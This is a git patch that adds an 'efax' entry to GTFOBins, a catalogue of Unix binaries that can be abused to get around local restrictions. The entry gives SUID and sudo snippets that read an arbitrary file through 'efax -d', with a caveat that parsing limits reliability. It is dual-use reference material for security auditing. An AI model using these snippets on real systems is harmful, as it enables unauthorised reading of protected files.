From b226bbfc5d8f191944007ea021f8b5ec163fa418 Mon Sep 17 00:00:00 2001 From: d4t4s3c Date: Sun, 9 Jan 2022 12:05:21 +0100 Subject: [PATCH] Add efax Co-authored-by: Andrea Cardaci --- _gtfobins/efax.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 _gtfobins/efax.md diff --git a/_gtfobins/efax.md b/_gtfobins/efax.md new file mode 100644 index 0000000..49fe147 --- /dev/null +++ b/_gtfobins/efax.md @@ -0,0 +1,12 @@ +--- +description: The content is actually parsed by the command, thus it may not be suitable for reading arbitrary files. +functions: + suid: + - code: | + LFILE=file_to_read + ./efax -d "$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo efax -d "$LFILE" +---